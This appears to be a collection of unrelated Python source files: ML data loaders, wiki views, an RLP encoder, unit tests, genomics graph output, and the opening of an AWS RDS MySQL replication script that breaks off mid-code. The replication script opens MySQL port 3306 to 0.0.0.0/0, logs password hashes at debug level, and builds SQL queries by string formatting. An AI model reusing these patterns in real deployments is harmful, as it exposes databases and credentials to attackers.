return (im_arr, l_arr)
def _parse_flist_item(self, line):
items = line.split("\t")
assert len(items) == 2
im = items[0]
l = items[1]
return (im, l)
@property
def provide_data(self):
return [("data", (self.batch_size, 3, self.crop_size, self.crop_size))]
@property
def provide_label(self):
label_dim = int(self.crop_size*self.label_shrink_scale)
return [("softmax_label", (self.batch_size, label_dim*label_dim))]
def reset(self):
self.data_count = 0
pass
def iter_next(self):
self.data_count += self.batch_size
return self.data_count <= self.epoch_size*self.batch_size
def next(self):
if self.iter_next():
data = self.get_data()
return DataBatch(data=[data[0]], label=[data[1]], pad=None, index=None)
else:
raise StopIteration
|
56169
|
import urllib.parse
from wikked.db.base import NoWantedPages
from wikked.page import WantedPage
from wikked.utils import get_absolute_url
from wikked.webimpl import (
get_page_meta, get_page_or_raise, make_page_title,
is_page_readable, get_redirect_target,
get_or_build_pagelist, get_generic_pagelist_builder,
UserPermissionError, CircularRedirectError, RedirectNotFoundError)
def build_pagelist_view_data(pages, user):
pages = sorted(pages, key=lambda p: p.url)
data = [get_page_meta(p) for p in pages if is_page_readable(p, user)]
result = {'pages': data}
return result
def generic_pagelist_view(wiki, user, list_name, filter_func, fields=None):
fields = fields or ['url', 'title', 'local_meta', 'meta']
pages = get_or_build_pagelist(
wiki,
list_name,
get_generic_pagelist_builder(wiki, filter_func, fields),
fields=fields)
return build_pagelist_view_data(pages, user)
def get_orphans(wiki, user):
def builder_func():
wiki.resolve()
pages = {}
rev_links = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta', 'links']):
pages[p.url] = p
rev_links.setdefault(p.url, 0)
for l in p.links:
abs_l = get_absolute_url(p.url, l)
cnt = rev_links.get(abs_l, 0)
rev_links[abs_l] = cnt + 1
or_pages = []
for tgt, cnt in rev_links.items():
if cnt == 0:
or_pages.append(pages[tgt])
return or_pages
fields = ['url', 'title', 'local_meta', 'meta', 'links']
pages = get_or_build_pagelist(wiki, 'orphans', builder_func, fields)
return build_pagelist_view_data(pages, user)
def get_broken_redirects(wiki, user):
def filter_func(page):
redirect_meta = page.getMeta('redirect')
if redirect_meta is None:
return False
path = get_absolute_url(page.url, redirect_meta)
try:
target, visited = get_redirect_target(
path,
fields=['url', 'local_meta', 'meta'])
except CircularRedirectError:
return True
except RedirectNotFoundError:
return True
return False
return generic_pagelist_view(wiki, user, 'broken_redirects', filter_func)
def get_double_redirects(wiki, user):
def builder_func():
wiki.resolve()
pages = {}
redirs = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta']):
pages[p.url] = p
target = p.getMeta('redirect')
if target:
target = get_absolute_url(p.url, target)
redirs[p.url] = target
dr_pages = []
for src, tgt in redirs.items():
if tgt in redirs:
dr_pages.append(pages[src])
return dr_pages
fields = ['url', 'title', 'local_meta', 'meta']
pages = get_or_build_pagelist(wiki, 'double_redirects', builder_func,
fields)
return build_pagelist_view_data(pages, user)
def get_dead_ends(wiki, user):
def filter_func(page):
return len(page.links) == 0
return generic_pagelist_view(
wiki, user, 'dead_ends', filter_func,
fields=['url', 'title', 'local_meta', 'meta', 'links'])
def get_broken_links(wiki, user):
def builder_func():
wiki.resolve()
pages = set()
page_existence = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta', 'links']):
# Gather all outgoing links from each page, then check which
# of those match another page in the dictionary.
for l in p.links:
abs_l = get_absolute_url(p.url, l)
exists = page_existence.get(abs_l, None)
if exists is None:
# Don't know yet if this URL is valid, so let's ask the
# database and cache the result.
exists = wiki.pageExists(abs_l)
page_existence[abs_l] = exists
if not exists:
pages.add(p)
return pages
fields = ['url', 'title', 'local_meta', 'meta']
pages = get_or_build_pagelist(wiki, 'broken_links', builder_func, fields)
return build_pagelist_view_data(pages, user)
def get_wanted_pages(wiki, user):
def builder_func():
wiki.resolve()
wanted = {}
page_existence = {}
for p in wiki.getPages(
no_endpoint_only=True,
fields=['url', 'title', 'local_meta', 'meta', 'links']):
for l in p.links:
abs_l = get_absolute_url(p.url, l)
exists = page_existence.get(abs_l, None)
if exists is None:
exists = wiki.pageExists(abs_l)
page_existence[abs_l] = exists
if not exists:
wanted.setdefault(abs_l, p)
return [WantedPage(u, p) for u, p in wanted.items()]
try:
wanted = sorted(wiki.db.getWantedPages(), key=lambda p: p.url)
except NoWantedPages:
wanted = None
if wanted is None:
wanted = builder_func()
wiki.db.saveWantedPages(wanted)
data = []
for w in wanted:
d = {'url': urllib.parse.quote(w.url.encode('utf-8')),
'title': make_page_title(w.url),
'wanted_by': {
'url': urllib.parse.quote(w.wanted_by.url.encode('utf-8')),
'title': w.wanted_by.title}
}
data.append(d)
result = {'wanted_pages': data}
return result
def list_pages(wiki, user, url=None):
pages = [p for p in wiki.getPages(url) if is_page_readable(p, user)]
page_metas = [get_page_meta(page) for page in pages]
result = {'path': url, 'pages': list(page_metas)}
return result
def get_search_results(wiki, user, query):
readable_hits = []
hits = list(wiki.index.search(query))
for h in hits:
try:
get_page_or_raise(wiki, h.url,
check_perms=(user, 'read'))
except UserPermissionError:
continue
readable_hits.append({
'url': h.url,
'title': h.title,
'text': h.hl_text})
result = {
'query': query,
'hit_count': len(readable_hits),
'hits': readable_hits}
return result
def get_search_preview_results(wiki, user, query):
readable_hits = []
hits = list(wiki.index.previewSearch(query))
for h in hits:
try:
get_page_or_raise(wiki, h.url,
check_perms=(user, 'read'))
except UserPermissionError:
continue
readable_hits.append({'url': h.url, 'title': h.title})
result = {
'query': query,
'hit_count': len(readable_hits),
'hits': readable_hits}
return result
|
56173
|
import sys
class InvariantParser:
'''
The InvariantParser is used to parse a Daikon-generated invariants file into a
dictionary mapping program points (ppts) to their invariants.
'''
# Path of the invariants file to be parsed.
filepath = ""
# String used to match entry separating lines in the invariants file.
separator_str = ""
def __init__(self, filepath):
'''
Return a InvariantParser object which is set to parse the file located at
*filepath*.
'''
self.filepath = filepath
self.separator_str = "==========================================================================="
def parse_invariants(self):
'''
Return a dictionary mapping ppts (strings) to sets of invariants (lists of
strings) parsed from the initialized invariants file.
'''
rtn_dict = {}
with open(self.filepath) as f:
contents = f.read()
for entry in contents.split(self.separator_str):
entry = entry.strip().split("\n")
rtn_dict[entry[0]] = entry[1:]
return rtn_dict
|
56234
|
from ray.rllib.utils import try_import_tf, try_import_torch
tf = try_import_tf()
torch, nn = try_import_torch()
def explained_variance(y, pred, framework="tf"):
if framework == "tf":
_, y_var = tf.nn.moments(y, axes=[0])
_, diff_var = tf.nn.moments(y - pred, axes=[0])
return tf.maximum(-1.0, 1 - (diff_var / y_var))
else:
y_var = torch.var(y, dim=[0])
diff_var = torch.var(y - pred, dim=[0])
min_ = torch.Tensor([-1.0])
return torch.max(
min_.to(
device=torch.device("cuda")
) if torch.cuda.is_available() else min_,
1 - (diff_var / y_var)
)
|
56318
|
from typing import Union, Callable, Type, Dict, Any
from ray.rllib import MultiAgentEnv, Policy
from ray.rllib.agents import Trainer
from ray.rllib.models import ModelV2
from ray.rllib.utils.typing import ResultDict
from grl.algos.nxdo.nxdo_manager.manager import SolveRestrictedGame
from grl.rl_apps.scenarios.scenario import RayScenario, Scenario
from grl.rl_apps.scenarios.stopping_conditions import StoppingCondition
def nxdo_default_log_filter(result: ResultDict) -> bool:
return "avg_policy_exploitability" in result or result["training_iteration"] % 10 == 0
class NXDOScenario(RayScenario):
def __init__(self,
name: str,
ray_cluster_cpus: Union[int, float],
ray_cluster_gpus: Union[int, float],
ray_object_store_memory_cap_gigabytes: Union[int, float],
use_openspiel_restricted_game: bool,
get_restricted_game_custom_model: Union[None, Callable[[MultiAgentEnv], Union[None, Type[ModelV2]]]],
xdo_metanash_method: str,
allow_stochastic_best_responses: bool,
get_restricted_game_solver: Callable[[Scenario], SolveRestrictedGame],
env_class: Type[MultiAgentEnv],
env_config: Dict[str, Any],
trainer_class_br: Type[Trainer],
policy_classes_br: Dict[str, Type[Policy]],
get_trainer_config_br: Callable[[MultiAgentEnv], Dict[str, Any]],
get_stopping_condition_br: Callable[[], StoppingCondition],
trainer_class_nfsp: Type[Trainer],
avg_trainer_class_nfsp: Type[Trainer],
policy_classes_nfsp: Dict[str, Type[Policy]],
anticipatory_param_nfsp: float,
get_trainer_config_nfsp: Callable[[MultiAgentEnv], Dict[str, Any]],
get_avg_trainer_config_nfsp: Callable[[MultiAgentEnv], Dict[str, Any]],
calculate_openspiel_metanash: bool,
calculate_openspiel_metanash_at_end: bool,
calc_metanash_every_n_iters: Union[None, int],
metanash_metrics_smoothing_episodes_override: Union[None, int],
ray_should_log_result_filter: Callable[[ResultDict], bool] = nxdo_default_log_filter):
super().__init__(name=name,
ray_cluster_cpus=ray_cluster_cpus,
ray_cluster_gpus=ray_cluster_gpus,
ray_object_store_memory_cap_gigabytes=ray_object_store_memory_cap_gigabytes,
ray_should_log_result_filter=ray_should_log_result_filter)
self.use_openspiel_restricted_game = use_openspiel_restricted_game
self.get_restricted_game_custom_model = get_restricted_game_custom_model
self.xdo_metanash_method = xdo_metanash_method
self.allow_stochastic_best_responses = allow_stochastic_best_responses
self.get_restricted_game_solver = get_restricted_game_solver
self.env_class = env_class
self.env_config = env_config
self.trainer_class_br = trainer_class_br
self.policy_classes_br = policy_classes_br
self.get_trainer_config_br = get_trainer_config_br
self.get_stopping_condition_br = get_stopping_condition_br
self.trainer_class_nfsp = trainer_class_nfsp
self.avg_trainer_class_nfsp = avg_trainer_class_nfsp
self.policy_classes_nfsp = policy_classes_nfsp
self.anticipatory_param_nfsp = anticipatory_param_nfsp
self.get_trainer_config_nfsp = get_trainer_config_nfsp
self.get_avg_trainer_config_nfsp = get_avg_trainer_config_nfsp
self.calculate_openspiel_metanash = calculate_openspiel_metanash
self.calculate_openspiel_metanash_at_end = calculate_openspiel_metanash_at_end
self.calc_metanash_every_n_iters = calc_metanash_every_n_iters
self.metanash_metrics_smoothing_episodes_override = metanash_metrics_smoothing_episodes_override
|
56333
|
import pickle
import random
import cv2 as cv
import numpy as np
import torch
from torch.utils.data import Dataset
from torchvision import transforms
from config import pickle_file, num_workers
from utils import align_face
# Data augmentation and normalization for training
# Just normalization for validation
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
# transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])
]),
}
class ArcFaceDataset(Dataset):
def __init__(self, split):
with open(pickle_file, 'rb') as file:
data = pickle.load(file)
samples = data['samples']
num_samples = len(samples)
num_train = num_samples
if split == 'train':
self.samples = samples[:num_train]
self.transformer = data_transforms['train']
def __getitem__(self, i):
sample = self.samples[i]
full_path = sample['full_path']
landmarks = sample['landmarks']
try:
img = align_face(full_path, landmarks)
except Exception:
print('full_path: ' + full_path)
raise
img = transforms.ToPILImage()(img)
img = self.transformer(img)
class_id = sample['class_id']
return img, class_id
def __len__(self):
return len(self.samples)
def shuffle(self):
np.random.shuffle(self.samples)
def show_align():
with open(pickle_file, 'rb') as file:
data = pickle.load(file)
samples = random.sample(data['samples'], 10)
for i, sample in enumerate(samples):
full_path = sample['full_path']
landmarks = sample['landmarks']
raw = cv.imread(full_path)
raw = cv.resize(raw, (224, 224))
img = align_face(full_path, landmarks)
filename = 'images/{}_raw.jpg'.format(i)
cv.imwrite(filename, raw)
filename = 'images/{}_img.jpg'.format(i)
cv.imwrite(filename, img)
if __name__ == "__main__":
train_dataset = ArcFaceDataset('train')
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=256, shuffle=True,
num_workers=num_workers,
pin_memory=True)
print(len(train_dataset))
print(len(train_loader))
|
56356
|
import FWCore.ParameterSet.Config as cms
# Remove duplicates from the electron list
electronsNoDuplicates = cms.EDFilter("DuplicatedElectronCleaner",
## reco electron input source
electronSource = cms.InputTag("gsfElectrons"),
)
|
56396
|
def byte(n):
return bytes([n])
def rlp_encode_bytes(x):
if len(x) == 1 and x < b'\x80':
# For a single byte whose value is in the [0x00, 0x7f] range,
# that byte is its own RLP encoding.
return x
elif len(x) < 56:
# Otherwise, if a string is 0-55 bytes long, the RLP encoding
# consists of a single byte with value 0x80 plus the length of
# the string followed by the string. The range of the first
# byte is thus [0x80, 0xb7].
return byte(len(x) + 0x80) + x
else:
length = to_binary(len(x))
# If a string is more than 55 bytes long, the RLP encoding
# consists of a single byte with value 0xb7 plus the length in
# bytes of the length of the string in binary form, followed by
# the length of the string, followed by the string. For example,
# a length-1024 string would be encoded as \xb9\x04\x00 followed
# by the string. The range of the first byte is thus [0xb8, 0xbf].
return byte(len(length) + 0xb7) + length + x
def rlp_encode_list(xs):
sx = b''.join(rlp_encode(x) for x in xs)
if len(sx) < 56:
# If the total payload of a list (i.e. the combined length of all
# its items being RLP encoded) is 0-55 bytes long, the RLP encoding
# consists of a single byte with value 0xc0 plus the length of the
# list followed by the concatenation of the RLP encodings of the
# items. The range of the first byte is thus [0xc0, 0xf7].
return byte(len(sx) + 0xc0) + sx
else:
length = to_binary(len(sx))
# If the total payload of a list is more than 55 bytes long, the
# RLP encoding consists of a single byte with value 0xf7 plus the
# length in bytes of the length of the payload in binary form,
# followed by the length of the payload, followed by the concatenation
# of the RLP encodings of the items. The range of the first byte is
# thus [0xf8, 0xff].
return byte(len(length) + 0xf7) + length + sx
def rlp_encode(x):
if isinstance(x,bytes):
return rlp_encode_bytes(x)
elif isinstance(x,list):
return rlp_encode_list(x)
else:
return "unknown type "
# encodes an integer as bytes, big-endian
def to_binary(n):
return n.to_bytes((n.bit_length() + 7) // 8, 'big')
assert(rlp_encode(b'dog').hex() == '83646f67')
assert(rlp_encode([[], [[]], [[], [[]]]]).hex() == 'c7c0c1c0c3c0c1c0')
|
56413
|
pm = sm.getChr().getPotentialMan()
pm.addPotential(pm.generateRandomPotential(1))
sm.completeQuestNoRewards(12394)
sm.dispose()
|
56415
|
class UpdateIpExclusionObject:
def __init__(self, filterIp, ipFilterId):
self.filterIp = filterIp
self.ipFilterId = ipFilterId
self.memo = None
|
56422
|
import pytest
from streaming_form_data.validators import MaxSizeValidator, ValidationError
def test_max_size_validator_empty_input():
validator = MaxSizeValidator(0)
with pytest.raises(ValidationError):
validator('x')
def test_max_size_validator_normal():
validator = MaxSizeValidator(5)
for char in 'hello':
validator(char)
with pytest.raises(ValidationError):
validator('x')
|
56424
|
import torch
def model_to_vector(model, emb_layer_name='input_emb'):
"""
get the wordvec weight
:param model:
:param emb_layer_name:
:return:
"""
sd = model.state_dict()
return sd[emb_layer_name + '.weight'].cpu().numpy().tolist()
def save_embedding(file_name, embeddings, id2word):
"""
wordvec save to text file
:param file_name:
:param embeddings:
:param id2word:
:return:
"""
fo = open(file_name, 'w')
for idx in range(len(embeddings)):
word = id2word[idx]
embed = embeddings[idx]
embed_list = [str(i) for i in embed]
line_str = ' '.join(embed_list)
fo.write(word + ' ' + line_str + '\n')
fo.close()
def nearest(model, vali_examples, vali_size, id2word_dict, top_k=8):
"""
find the nearest word of vali_examples
:param model: model
:param vali_examples: []
:param vali_size: int
:param id2word_dict: {}
:param top_k: int
:return:
"""
vali_examples = torch.tensor(vali_examples, dtype=torch.long).cuda()
vali_emb = model.predict(vali_examples)
# sim: [batch_size, vocab_size]
sim = torch.mm(vali_emb, model.input_emb.weight.transpose(0, 1))
for i in range(vali_size):
vali_word = id2word_dict[vali_examples[i].item()]
nearest = (-sim[i, :]).sort()[1][1: top_k + 1]
log_str = 'Nearest to %s:' % vali_word
for k in range(top_k):
close_word = id2word_dict[nearest[k].item()]
log_str = '%s %s,' % (log_str, close_word)
print(log_str)
|
56435
|
import sys
import os
import numpy.random
from amuse.test import amusetest
from amuse.units import units, nbody_system
from amuse.ext.boss_bodenheimer import bb79_cloud
numpy.random.seed(1234567)
class BossBodenheimerTests(amusetest.TestCase):
def test1(self):
numpy.random.seed(1234)
mc=bb79_cloud(targetN=1000).result
self.assertEqual(len(mc),1000)
ek=mc.kinetic_energy()
ep=mc.potential_energy(G=nbody_system.G)
eth=mc.thermal_energy()
self.assertAlmostEqual(eth/ep, -0.25, 2)
self.assertAlmostEqual(ek/ep, -0.2, 2)
def test2(self):
numpy.random.seed(1234)
convert=nbody_system.nbody_to_si(1. | units.MSun,3.2e16| units.cm)
mc=bb79_cloud(targetN=1000,convert_nbody=convert).result
self.assertEqual(len(mc),1000)
ek=mc.kinetic_energy()
ep=mc.potential_energy()
eth=mc.thermal_energy()
self.assertAlmostEqual(eth/ep, -0.25, 2)
self.assertAlmostEqual(ek/ep, -0.2, 2)
|
56455
|
from raytkTools import RaytkTools
# noinspection PyUnreachableCode
if False:
# noinspection PyUnresolvedReferences
from _stubs import *
from ..ropEditor.ropEditor import ROPEditor
iop.ropEditor = ROPEditor(COMP())
class CreateRopDialog:
def __init__(self, ownerComp: 'COMP'):
self.ownerComp = ownerComp
def _setMessageText(self, message):
dat = self.ownerComp.op('set_messageText')
dat.clear()
dat.write(message or '')
def Open(self, _=None):
self.ownerComp.op('window').par.winopen.pulse()
self.ownerComp.op('typeName_field').par.Value0 = ''
self._setMessageText('')
def Close(self, _=None):
self.ownerComp.op('window').par.winclose.pulse()
self._setMessageText('')
def Create(self):
self._setMessageText('')
category = self.ownerComp.op('category_dropmenu').par.Value0.eval()
name = self.ownerComp.op('typeName_field').par.Value0.eval()
try:
rop = RaytkTools().createNewRopType(typeName=name, category=category)
except Exception as err:
self._setMessageText(str(err))
return
iop.ropEditor.LoadROP(rop)
self.Close()
|
56475
|
import logging
import re
import gzip
from pathlib import Path
from argparse import ArgumentParser
from Bio import AlignIO
from make_prg.from_msa import MSA
from make_prg.prg_encoder import PrgEncoder, PRG_Ints
def load_alignment_file(msa_file: str, alignment_format: str) -> MSA:
msa_file = str(msa_file)
logging.info("Read from MSA file %s", msa_file)
if msa_file.endswith(".gz"):
logging.debug("MSA is gzipped")
handle = gzip.open(msa_file, "rt")
alignment = AlignIO.read(handle, alignment_format)
handle.close()
else:
alignment = AlignIO.read(msa_file, alignment_format)
for record in alignment:
record.seq = record.seq.upper()
return alignment
# ************/
# GFA code */
# ***********/
class GFA_Output:
"""
A simple class for converting a PRG string into a GFA file
TODO: Update to GFA2 format
"""
def __init__(self, gfa_string="", gfa_id=0, gfa_site=5):
self.gfa_string = gfa_string
self.gfa_id = gfa_id
self.gfa_site = gfa_site
self.delim_char = " " # This mirrors the AlignedSeq class.
def split_on_site(self, prg_string, site_num):
site_coords = [
(a.start(), a.end())
for a in list(
re.finditer(
"%s%d%s" % (self.delim_char, site_num, self.delim_char), prg_string
)
)
]
last_pos = None
split_strings = []
for (start, end) in site_coords:
split_strings.append(prg_string[last_pos:start])
last_pos = end
split_strings.append(prg_string[last_pos:])
delim = "%s%d%s" % (self.delim_char, site_num, self.delim_char)
check_string = delim.join(split_strings)
assert check_string == prg_string, (
"Something has gone wrong with the string split for site %d\nsplit_"
"strings: %s" % (site_num, split_strings)
)
return split_strings
def build_gfa_string(self, prg_string, pre_var_id=None):
"""Takes prg_string and builds a gfa_string with fragments
from the prg_string."""
end_ids = []
# iterate through sites present, updating gfa_string with each in turn
while str(self.gfa_site) in prg_string:
logging.debug("gfa_site: %d", self.gfa_site)
prgs = self.split_on_site(prg_string, self.gfa_site)
logging.debug("prgs: %s", prgs)
assert len(prgs) == 3, "Invalid prg sequence %s for site %d and id %d" % (
prg_string,
self.gfa_site,
self.gfa_id,
)
# add pre-var site string and links from previous seq fragments
if prgs[0] != "":
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, prgs[0])
else:
# adds an empty node for empty pre var site seqs
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, "*")
pre_var_id = self.gfa_id
self.gfa_id += 1
for id in end_ids:
self.gfa_string += "L\t%d\t+\t%d\t+\t0M\n" % (id, pre_var_id)
end_ids = []
# recursively add segments for each of the variant haplotypes at
# this site, saving the end id for each haplotype
vars = self.split_on_site(prgs[1], self.gfa_site + 1)
assert len(vars) > 1, "Invalid prg sequence %s for site %d and id %d" % (
prg_string,
self.gfa_site + 1,
self.gfa_id,
)
logging.debug("vars: %s", vars)
self.gfa_site += 2
logging.debug("gfa_site: %d", self.gfa_site)
for var_string in vars:
if pre_var_id != None:
self.gfa_string += "L\t%d\t+\t%d\t+\t0M\n" % (
pre_var_id,
self.gfa_id,
)
var_end_ids = self.build_gfa_string(
prg_string=var_string, pre_var_id=pre_var_id
)
end_ids.extend(var_end_ids)
prg_string = prgs[2]
pre_var_id = None
# finally add the final bit of sequence after variant site
if prg_string != "":
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, prg_string)
else:
self.gfa_string += "S\t%d\t%s\tRC:i:0\n" % (self.gfa_id, "*")
for id in end_ids:
self.gfa_string += "L\t%d\t+\t%d\t+\t0M\n" % (id, self.gfa_id)
end_ids = []
return_id = [self.gfa_id]
self.gfa_id += 1
return return_id
def write_gfa(outfile, prg_string):
"""
Writes a gfa file from prg string.
"""
with open(outfile, "w") as f:
# initialize gfa_string, id and site, then update string with the prg
gfa_string = "H\tVN:Z:1.0\tbn:Z:--linear --singlearr\n"
gfa_id = 0
gfa_site = 5
gfa_obj = GFA_Output(gfa_string)
gfa_obj.build_gfa_string(prg_string=prg_string)
f.write(gfa_obj.gfa_string)
# ******************/
# Write PRG code */
# *****************/
def write_prg(prg_fname: Path, prg_string: str, options: ArgumentParser):
"""
Writes th prg to `output_file`.
Writes it as a human readable string, and also as an integer vector
"""
seqid = options.seqid or options.prg_name
if options.output_type.prg:
with prg_fname.open("w") as prg:
header = f">{seqid} max_nest={options.max_nesting} min_match={options.min_match_length}"
print(f"{header}\n{prg_string}", file=prg)
if options.output_type.binary:
prg_ints_fpath = prg_fname.with_suffix(".bin")
prg_encoder = PrgEncoder()
prg_ints: PRG_Ints = prg_encoder.encode(prg_string)
with prg_ints_fpath.open("wb") as ostream:
prg_encoder.write(prg_ints, ostream)
|
56515
|
import argparse
import subprocess
import logging
import time
import re
import os
from datetime import datetime
from contextlib import closing, contextmanager
import pymysql
import pymysql.cursors
import boto3
import botocore.exceptions
logger = logging.getLogger(__name__)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true", help="print debug logs")
parser.add_argument("--region", required=True, help="AWS region name")
parser.add_argument(
"--source-instance-id",
required=True,
help="name of the existing instance (This is going to be master when replication is setup.)")
parser.add_argument(
"--new-instance-id", required=True, help="name of the slave instance that is going to be created")
parser.add_argument(
"--master-user-name", required=True, help="master username of instance specified with --source-instance-id")
parser.add_argument(
"--master-user-password",
required=True,
help="master user password of instance specified with --source-instance-id")
parser.add_argument(
"--databases", required=True, help="comma separated database names that need to be copied to slave")
parser.add_argument("--users", help="comma separated user names that need to be copied to slave")
parser.add_argument("--availability-zone", help="set it if you want slave on different availability zone")
parser.add_argument("--db-instance-class", help="set it if you want different instance class on slave")
parser.add_argument("--engine-version", help="set it if you want different engine version on slave")
parser.add_argument("--parameter-group", help="set it if you want different parameter group on slave")
parser.add_argument("--option-group", help="set it if you want different option group on slave")
parser.add_argument(
"--allocated-storage", type=int, help="set it if you want to grow/shrink storage space on slave")
parser.add_argument(
"--iops",
type=int,
help="set it if you want different IOPS on slave (must be valid for given --allocated-storage)")
parser.add_argument(
"--binlog-retention-hours",
type=int,
default=24,
help="Darbe set 'binlog retention hours' on master to allow enough time for copying data between instances."
"Increase if your data is too big so that it cannot be copied in 24 hours.")
args = parser.parse_args()
formatter = logging.Formatter('%(asctime)s %(levelname)-5.5s L%(lineno)-3d %(message)s', datefmt='%H:%M:%S')
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if args.debug:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logger.info("checking required programs")
subprocess.check_call(['which', 'mysqldump'])
subprocess.check_call(['which', 'mysql'])
# put root password to environ for not using -p flag with mysql commands below.
os.environ['MYSQL_PWD'] = args.master_user_password
rds = boto3.client('rds', region_name=args.region)
ec2 = boto3.client('ec2', region_name=args.region)
db_instance_available = rds.get_waiter('db_instance_available')
# unique string representing current second like 20160101090500
timestamp = str(datetime.utcnow()).replace('-', '').replace(':', '').replace(' ', '')[:14]
@contextmanager
def connect_db(instance, cursorclass=pymysql.cursors.Cursor):
"""Yields a cursor on a new connection to a database."""
conn = pymysql.connect(
user=args.master_user_name,
password=args.master_user_password,
host=instance['Endpoint']['Address'],
port=instance['Endpoint']['Port'],
autocommit=True,
cursorclass=cursorclass)
with closing(conn):
cursor = conn.cursor()
with closing(cursor):
yield cursor
def wait_db_instance_available(instance_id):
"""Timeout on waiter cannot be changed. We keep continue to wait on timeout error."""
while True:
try:
db_instance_available.wait(DBInstanceIdentifier=instance_id)
except botocore.exceptions.WaiterError:
continue
else:
break
def wait_until_zero_lag(instance):
"""Blocks until replication lag is zero."""
while True:
time.sleep(4)
try:
with connect_db(instance, cursorclass=pymysql.cursors.DictCursor) as cursor:
cursor.execute("SHOW SLAVE STATUS")
slave_status = cursor.fetchone()
except Exception as e:
logger.error(str(e))
else:
seconds_behind_master = slave_status['Seconds_Behind_Master']
logger.info("seconds behind master: %s", seconds_behind_master)
if seconds_behind_master is None:
continue
if seconds_behind_master < 1:
break
logger.info("getting details of source instance")
source_instance = rds.describe_db_instances(DBInstanceIdentifier=args.source_instance_id)['DBInstances'][0]
logger.info("creating replication security group")
vpc_id = source_instance['DBSubnetGroup']['VpcId']
try:
response = ec2.create_security_group(
GroupName="darbe-replication",
VpcId=vpc_id,
Description="created by darbe for replication between instances")
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'InvalidGroup.Duplicate':
raise
logger.info("security group already exists")
security_group_id = ec2.describe_security_groups(Filters=[{
'Name': 'vpc-id',
"Values": [vpc_id]
}, {
'Name': 'group-name',
'Values': ['darbe-replication']
}])['SecurityGroups'][0]['GroupId']
else:
security_group_id = response['GroupId']
logger.info("modifying security group rules: %s", security_group_id)
try:
ec2.authorize_security_group_ingress(
GroupId=security_group_id,
IpPermissions=[{
'IpProtocol': 'tcp',
'FromPort': 3306,
'ToPort': 3306,
'IpRanges': [{
'CidrIp': '0.0.0.0/0'
}]
}])
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] != 'InvalidPermission.Duplicate':
raise
logger.info("security group permission already exists")
security_group_ids = [g['VpcSecurityGroupId'] for g in source_instance['VpcSecurityGroups']]
if security_group_id in security_group_ids:
logger.info("replication security group is already attached to the source instance")
else:
logger.info("adding replication security group to the source instance")
security_group_ids.append(security_group_id)
rds.modify_db_instance(DBInstanceIdentifier=args.source_instance_id, VpcSecurityGroupIds=security_group_ids)
logger.info("waiting for source instance to become available")
time.sleep(60) # instance state does not switch to "modifying" immediately
wait_db_instance_available(args.source_instance_id)
with connect_db(source_instance) as cursor:
cursor.execute("SELECT VERSION()")
version_string = cursor.fetchone()[0]
match = re.match(r'(\d+)\.(\d+)\.(\d+)', version_string)
version = tuple(map(int, match.groups())) # type: ignore
logger.info("source instance mysql version: %s", version)
grants = []
if args.users:
logger.info("getting grants from source instance")
with connect_db(source_instance) as cursor:
if version < (5, 7, 6):
password_column = 'Password'
else:
password_column = 'authentication_string'
users_in = ','.join(map(lambda x: "'%s'" % x, args.users.split(',')))
sql = "SELECT User, Host, %s FROM mysql.user WHERE User in (%s)" % (password_column, users_in)
logger.debug("running sql: %s", sql)
cursor.execute(sql)
for user, host, password in cursor.fetchall():
logger.debug("user: %s, host: %s, password: %s", user, host, password)
full_user = "'{}'@'{}'".format(user, host)
logger.debug("full user: %r", full_user)
if version >= (5, 7, 6):
cursor.execute("SHOW CREATE USER %s" % full_user)
create_user_sql = cursor.fetchall()[0][0]
grants.append(create_user_sql)
cursor.execute("SHOW GRANTS FOR %s" % full_user)
for grant in cursor.fetchall():
grant = str(grant[0])
logger.debug("grant: %s", grant)
if version < (5, 7, 6) and 'IDENTIFIED BY' in grant:
grant = grant.replace("<secret>", "'%s'" % password)
grants.append(grant)
logger.info("setting binlog retention hours on source instance to: %s", args.binlog_retention_hours)
with connect_db(source_instance) as cursor:
sql = "call mysql.rds_set_configuration('binlog retention hours', %i)" % args.binlog_retention_hours
logger.debug("running sql: %s", sql)
cursor.execute(sql)
original_parameter_group = args.parameter_group or source_instance['DBParameterGroups'][0]['DBParameterGroupName']
match = re.match(r'.+-darbe-(\d+)', original_parameter_group)
if match:
new_parameter_group = original_parameter_group.replace(match.groups()[0], timestamp)
else:
new_parameter_group = "%s-darbe-%s" % (original_parameter_group, timestamp)
logger.info("copying parameter group as: %s", new_parameter_group)
rds.copy_db_parameter_group(
SourceDBParameterGroupIdentifier=original_parameter_group,
TargetDBParameterGroupIdentifier=new_parameter_group,
TargetDBParameterGroupDescription="copied from %s then modified" % original_parameter_group)
logger.info("modifying new parameter group")
rds.modify_db_parameter_group(
DBParameterGroupName=new_parameter_group,
# these parameters makes slave sql thread run faster,
# otherwise slave may not catch up with the master for write intensive load.
Parameters=[
{
'ParameterName': 'innodb_flush_log_at_trx_commit',
'ParameterValue': '2',
'ApplyMethod': 'immediate',
},
{
'ParameterName': 'sync_binlog',
'ParameterValue': '0',
'ApplyMethod': 'immediate',
},
])
logger.info("creating new db instance: %s", args.new_instance_id)
new_instance_params = dict(
AllocatedStorage=args.allocated_storage or source_instance['AllocatedStorage'],
AutoMinorVersionUpgrade=source_instance['AutoMinorVersionUpgrade'],
